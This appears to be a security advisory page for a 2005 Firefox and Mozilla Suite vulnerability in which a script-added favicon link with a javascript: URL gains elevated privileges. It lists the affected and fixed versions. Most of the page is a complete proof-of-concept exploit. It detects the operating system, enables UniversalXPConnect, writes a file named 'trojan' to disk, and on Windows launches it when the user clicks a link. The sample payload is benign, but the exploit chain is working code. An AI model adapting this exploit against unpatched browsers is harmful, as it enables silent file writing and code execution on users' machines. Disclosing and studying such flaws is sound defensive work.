|
Brought to you by:
Suppliers of:
|
|
|
| |
| Firefox and the Mozilla Suite support custom "favicons" through the <LINK rel="icon"> tag. If a link tag is added to the page programmatically and a JavaScript: url is used, then script will run with elevated privileges and could run or install malicious software. |
| |
Credit:
The information has been provided by Michael Krax.
The original article can be found at: http://www.mozilla.org/security/announce/mfsa2005-37.html
|
| |
Vulnerable Systems:
* Firefox version 1.0.2 and prior
* Mozilla Suite version 1.7.6 and prior
Immune Systems:
* Firefox version 1.0.3 or newer
* Mozilla Suite version 1.7.7 or newer
Exploit:
// If a user clicks on a link, this code will create and launch the file c:\trojan.bat (on Windows).
// On Linux and Mac OS X this code will create the file ~/trojan or /trojan
< html>
< head>
< link rel="SHORTCUT ICON" href="favicon.ico">
< script language="JavaScript" type="text/javascript">
var pf = navigator.platform.toLowerCase();
if (pf.indexOf("win") != -1) {
var os = "win";
} else if (pf.indexOf("mac") != -1) {
var os = "mac";
} else {
var os = "linux"
}
function runDemo() {
// this is an ugly caching workaround
document.getElementById('outhtml').innerHTML = "";
document.getElementById('outhtml').innerHTML +=
document.getElementById('clearhtml').value
document.getElementById('outhtml').innerHTML +=
document.getElementById('clearhtml').value
document.getElementById('outhtml').innerHTML +=
document.getElementById('clearhtml').value
window.setTimeout("document.getElementById('outhtml').innerHTML +=
document.getElementById('linkhtml_"+os+"').value",300);
}
</script>
</head>
<body>
< div id="outhtml" style="display:none"></div>
< textarea id="clearhtml" style="display:none">
< link rel="SHORTCUT ICON" href="favicon.ico">
</textarea>
< textarea id="linkhtml_win" style="display:none">
< link rel="SHORTCUT ICON" href="javascript:delayedOpenWindow('javascript:netscape.security.PrivilegeManager.enablePrivilege(\'UniversalXPConnect\');
file=Components.classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces.nsILocalFile);
file.initWithPath(\'c:\\\\trojan.bat\');
file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);
outputStream = Components.classes[\'@mozilla.org/network/file-output-stream;1\'].createInstance( Components.interfaces.nsIFileOutputStream ); outputStream.init(file, 0x04|0x08|0x20, 420, 0);
output=\'@ECHO OFF\\n:BEGIN\\nCLS\\nDIR\\nPAUSE\\n:END\';
outputStream.write(output, output.length);
outputStream.close();
file.launch();', '', '')">
</textarea>
< textarea id="linkhtml_mac" style="display:none">
< link rel="SHORTCUT ICON" href="javascript:delayedOpenWindow('javascript:netscape.security.PrivilegeManager.enablePrivilege(\'UniversalXPConnect\');
file=Components.classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces.nsILocalFile);
file.initWithPath(\'/trojan\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 420);
outputStream=Components.classes
[\'@mozilla.org/network/file-output-stream;1\'].createInstance(Components.interfaces
.nsIFileOutputStream);outputStream.init(file,0x04|0x08|0x20,420,0);
output=\'trojan!\';outputStream.write(output,output.length);outputStream.close();','','')">
</textarea>
< textarea id="linkhtml_linux" style="display:none">
< link rel="SHORTCUT ICON" href="javascript:delayedOpenWindow('javascript:netscape.security.PrivilegeManager.enablePrivilege(\'UniversalXPConnect\'); file=Components.classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces.nsILocalFile);
file.initWithPath(\'~/trojan\');
file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420); outputStream=Components.classes[\'@mozilla.org/network/file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputStream); outputStream.init(file, 0x04|0x08|0x20, 420, 0); output=\'trojan!\'; outputStream.write(output, output.length); outputStream.close();', '', '')">
</textarea><br>
< a href="#" onclick="runDemo();runDemo();">Click HERE</a>
</div>
</body>
</html>
|
|
|
|
|
